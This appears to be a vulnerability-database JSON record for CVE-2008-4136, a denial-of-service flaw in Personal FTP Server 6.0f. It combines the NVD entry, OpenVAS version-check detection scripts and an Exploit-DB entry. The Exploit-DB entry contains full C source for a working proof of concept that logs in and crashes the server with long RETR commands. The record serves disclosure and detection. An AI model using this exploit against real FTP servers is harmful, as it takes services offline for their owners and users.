{"id": "CVE-2008-4136", "bulletinFamily": "NVD", "title": "CVE-2008-4136", "description": "Michael Roth Software Personal FTP Server (PFT) 6.0f allows remote attackers to cause a denial of service (service crash) via multiple RETR commands, possibly involving long filenames.", "published": "2008-09-24T01:41:37", "modified": "2017-09-28T21:32:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4136", "reporter": "NVD", "references": ["http://shinnok.evonet.ro/vulns_html/pftp.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/45129", "http://www.securitytracker.com/id?1020897", "http://www.securityfocus.com/bid/31173", "https://www.exploit-db.com/exploits/6458"], "cvelist": ["CVE-2008-4136"], "type": "cve", "lastseen": "2017-09-29T14:26:06", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:michael_roth_software:pftp:6.0f"], "cvelist": ["CVE-2008-4136"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "description": "Michael Roth Software Personal FTP Server (PFT) 6.0f allows remote attackers to cause a denial of service (service crash) via multiple RETR commands, possibly involving long filenames.", "edition": 2, "enchantments": {}, "hash": "954c257dc12079695c3911b1f6d3875ebfad038c1756f745ed396dfd669ca90d", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "b1ad1e44cc523c67a7941126b7f491ce", "key": "cpe"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "6d919c86ddab3dd25852bbe936330db3", "key": "title"}, {"hash": "d259bb02e40f6c478f3829adce30d26f", "key": "references"}, {"hash": "2ed8c5ab0de6407d9f02c0e440f95d35", "key": "published"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "afd81a474c4bb23356759e8dfc93f58e", "key": "href"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}, {"hash": "a79dd51e2fbd2241ef0876c4ffa1825c", "key": "modified"}, {"hash": "52501f98caff75dd70de379ff48dbe38", "key": "description"}, {"hash": "3001b6a33865d87027ce38d9928b80df", "key": "cvelist"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4136", "id": "CVE-2008-4136", "lastseen": "2017-08-08T11:24:54", "modified": "2017-08-07T21:32:26", "objectVersion": "1.3", "published": "2008-09-24T01:41:37", "references": ["http://www.milw0rm.com/exploits/6458", "http://shinnok.evonet.ro/vulns_html/pftp.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/45129", "http://www.securitytracker.com/id?1020897", "http://www.securityfocus.com/bid/31173"], "reporter": "NVD", "scanner": [], "title": "CVE-2008-4136", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-08-08T11:24:54"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:michael_roth_software:pftp:6.0f"], "cvelist": ["CVE-2008-4136"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "description": "Michael Roth Software Personal FTP Server (PFT) 6.0f allows remote attackers to cause a denial of service (service crash) via multiple RETR commands, possibly involving long filenames.", "edition": 1, "enchantments": {}, "hash": "e9e0e58b0bca58f6e7b6553ae662b6a59268d65c527f9bdc619a871837dc6eca", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "8f2a4a0889bd07e7b7f4101f4e7856ec", "key": "modified"}, {"hash": "b1ad1e44cc523c67a7941126b7f491ce", "key": "cpe"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "6d919c86ddab3dd25852bbe936330db3", "key": "title"}, {"hash": "2ed8c5ab0de6407d9f02c0e440f95d35", "key": "published"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "afd81a474c4bb23356759e8dfc93f58e", "key": "href"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}, {"hash": "d5bf3c4000f0c06e869269ff86483d19", "key": "references"}, {"hash": "52501f98caff75dd70de379ff48dbe38", "key": "description"}, {"hash": "3001b6a33865d87027ce38d9928b80df", "key": "cvelist"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4136", "id": "CVE-2008-4136", "lastseen": "2016-09-03T11:02:44", "modified": "2009-08-19T01:19:27", "objectVersion": "1.2", "published": "2008-09-24T01:41:37", "references": ["http://www.milw0rm.com/exploits/6458", "http://shinnok.evonet.ro/vulns_html/pftp.html", "http://www.securitytracker.com/id?1020897", "http://www.securityfocus.com/bid/31173", "http://xforce.iss.net/xforce/xfdb/45129"], "reporter": "NVD", "scanner": [], "title": "CVE-2008-4136", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T11:02:44"}], "edition": 3, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "b1ad1e44cc523c67a7941126b7f491ce"}, {"key": "cvelist", "hash": "3001b6a33865d87027ce38d9928b80df"}, {"key": "cvss", "hash": "84813b1457b92d6ba1174abffbb83a2f"}, {"key": "description", "hash": "52501f98caff75dd70de379ff48dbe38"}, {"key": "href", "hash": "afd81a474c4bb23356759e8dfc93f58e"}, {"key": "modified", "hash": "c644c7fba33ef6f390a49b558d3dbf23"}, {"key": "published", "hash": "2ed8c5ab0de6407d9f02c0e440f95d35"}, {"key": "references", "hash": "f2a9dedd85da4f9569d7b317542972a6"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "6d919c86ddab3dd25852bbe936330db3"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "a16ea368fa7528b1e58e4eefd9110d10eeb0d7d1fb3b18aa7400457d8abb3094", "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2017-09-29T14:26:06"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "cpe": ["cpe:/a:michael_roth_software:pftp:6.0f"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}

{"openvas": [{"lastseen": "2018-09-06T15:40:27", "references": ["http://shinnok.evonet.ro/vulns_html/pftp.html", "http://downloads.securityfocus.com/vulnerabilities/exploits/31173.c"], "pluginID": "1361412562310900127", "description": "The host is running Personal FTP Server, which is prone to denial\n of service vulnerability.", "edition": 4, "reporter": "Copyright (C) 2008 SecPod", "published": "2008-09-25T00:00:00", "title": "Personal FTP Server RETR Command Remote Denial of Service Vulnerability", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Denial of Service", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4136"], "modified": "2018-09-06T00:00:00", "id": "OPENVAS:1361412562310900127", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900127", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_personal_ftp_server_dos_vuln_900127.nasl 11262 2018-09-06 09:06:46Z cfischer $\n# Description: Personal FTP Server RETR Command Remote Denial of Service Vulnerability\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2008 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n##############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900127\");\n script_version(\"$Revision: 11262 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-06 11:06:46 +0200 (Thu, 06 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-25 09:10:39 +0200 (Thu, 25 Sep 2008)\");\n script_cve_id(\"CVE-2008-4136\");\n script_bugtraq_id(31173);\n script_copyright(\"Copyright (C) 2008 SecPod\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Denial of Service\");\n script_name(\"Personal FTP Server RETR Command Remote Denial of Service Vulnerability\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_xref(name:\"URL\", value:\"http://shinnok.evonet.ro/vulns_html/pftp.html\");\n script_xref(name:\"URL\", value:\"http://downloads.securityfocus.com/vulnerabilities/exploits/31173.c\");\n\n script_tag(name:\"summary\", value:\"The host is running Personal FTP Server, which is prone to denial\n of service vulnerability.\");\n\n script_tag(name:\"insight\", value:\"This issue is due to an error when handling the RETR command.\");\n\n script_tag(name:\"affected\", value:\"Michael Roth Personal FTP Server 6.0f and prior on Windows (all).\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability.\n Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the\n product or replace the product by another one.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will deny the service by sending\n multiple RETR commands with an arbitrary argument.\n\n Impact Level : Application\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\n\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\The Personal FTP Server_is1\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\npftpVer = registry_get_sz(key:key, item:\"DisplayVersion\");\nif(!pftpVer) exit(0);\n\nif(egrep(pattern:\"^([0-5]\\..*|6\\.0([a-f])?)$\", string:pftpVer)){\n report = report_fixed_ver(installed_version:pftpVer, fixed_version:\"WillNotFix\");\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:14", "references": ["http://shinnok.evonet.ro/vulns_html/pftp.html", "http://downloads.securityfocus.com/vulnerabilities/exploits/31173.c"], "pluginID": "900127", "description": "The host is running Personal FTP Server, which is prone to denial\n of service vulnerability.", "edition": 1, "reporter": "Copyright (C) 2008 SecPod", "published": "2008-09-25T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Personal FTP Server RETR Command Remote Denial of Service Vulnerability", "type": "openvas", "naslFamily": "Denial of Service", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4136"], "modified": "2017-02-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=900127", "id": "OPENVAS:900127", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_personal_ftp_server_dos_vuln_900127.nasl 5370 2017-02-20 15:24:26Z cfi $\n# Description: Personal FTP Server RETR Command Remote Denial of Service Vulnerability\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2008 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n##############################################################################\n\ntag_impact = \"Successful exploitation will deny the service by sending\n multiple RETR commands with an arbitrary argument.\n Impact Level : Application\";\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\nFor updates refer to http://www.michael-roth-software.de/new/Produkte.html\";\n\ntag_affected = \"Michael Roth Personal FTP Server 6.0f and prior on Windows (all).\";\n\ntag_insight = \"This issue is due to an error when handling the RETR command.\";\n\n\ntag_summary = \"The host is running Personal FTP Server, which is prone to denial\n of service vulnerability.\";\n\n\nif(description)\n{\n script_id(900127);\n script_version(\"$Revision: 5370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 16:24:26 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-25 09:10:39 +0200 (Thu, 25 Sep 2008)\");\n script_cve_id(\"CVE-2008-4136\");\n script_bugtraq_id(31173);\n script_copyright(\"Copyright (C) 2008 SecPod\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_family(\"Denial of Service\");\n script_name(\"Personal FTP Server RETR Command Remote Denial of Service Vulnerability\");\n\n script_dependencies(\"secpod_reg_enum.nasl\", \"find_service.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(\"Services/ftp\", 21, 139, 445);\n script_xref(name : \"URL\" , value : \"http://shinnok.evonet.ro/vulns_html/pftp.html\");\n script_xref(name : \"URL\" , value : \"http://downloads.securityfocus.com/vulnerabilities/exploits/31173.c\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\n include(\"smb_nt.inc\");\n\n if(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n }\n \n port = get_kb_item(\"Services/ftp\");\n if(!port){\n port = 21;\n }\n\n if(!get_port_state(port)){\n exit(0);\n }\n\n pftpVer = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" +\n \"\\Uninstall\\The Personal FTP Server_is1\",\n item:\"DisplayVersion\");\n\n if(egrep(pattern:\"^([0-5]\\..*|6\\.0([a-f])?)$\", string:pftpVer)){\n security_message(port);\n }\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T23:54:49", "osvdbidlist": ["48178"], "references": [], "description": "The Personal FTP Server 6.0f RETR Denial of Service Exploit. CVE-2008-4136. Dos exploit for windows platform", "edition": 1, "reporter": "Shinnok", "published": "2008-09-14T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "exploitdb", "title": "The Personal FTP Server 6.0f RETR Denial of Service Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4136"], "modified": "2008-09-14T00:00:00", "id": "EDB-ID:6458", "href": "https://www.exploit-db.com/exploits/6458/", "sourceData": "/*\n*** The Personal FTP Server 6.0f RETR DOS exploit ***\n\nA vulnerability exists in the way Personal FTP Server handles\nmultiple RETR commands with overly long filenames.When confronted\nwith such consecutive requests the server will crash.\n\nUsage : ./pftpdos ip port user password\nEx. : ./pftpdos 127.0.0.1 21 test test\n\nPersonal FTP Server homepage: http://www.michael-roth-software.de/\n\nDiscovey + POC by Shinnok raydenxy [at] yahoo <dot> com\nhttp://shinnok.evonet.ro\n\n*/\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <netinet/in.h>\n#include <string.h>\n#include <malloc.h>\n#include <errno.h>\n\nint\nmin (int x, int y)\n{\n if (x < y)return x;\n else\n return y;\n}\nextern int errno;\n\nint\nmain (int argc, char *argv[])\n{\n struct sockaddr_in server;\n int i, t, s;\n char *req, *buff;\n s = socket (AF_INET, SOCK_STREAM, 0);\n bzero (&server, sizeof (server));\n server.sin_family = AF_INET;\n server.sin_addr.s_addr = inet_addr (argv[1]);\n server.sin_port = htons (atoi (argv[2]));\n connect (s, (struct sockaddr *) &server, sizeof (struct sockaddr));\n req = malloc (sizeof (char) * \\\n (((strlen (argv[3]) - strlen (argv[4])) + \\\n min (strlen (argv[3]), strlen (argv[4])) + 8)));\n sprintf (req, \"USER %s\\xD\\xA\", argv[3]);\n write (s, req, strlen (req));\n sprintf (req, \"PASS %s\\xD\\xA\", argv[4]);\n write (s, req, strlen (req));\n free (req);\n for (i = 1; i <= 5; i++)\n {\n t = (sizeof (char) * 1000 * i);\n buff = malloc (t + 1);\n memset (buff, 'A', t);\n buff[t + 1] = '\\0';\n req = malloc (t + 9);\n sprintf (req, \"RETR %s\\xD\\xA\", buff);\n if (write (s, req, strlen (req)) == -1)\n {\n perror (NULL);\n printf (\"Target pwned!\\n\", errno);\n }\n free (req);\n free (buff);\n sleep (1);\n }\n close (s);\n return (EXIT_SUCCESS);\n}\n\n// milw0rm.com [2008-09-14]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6458/"}]}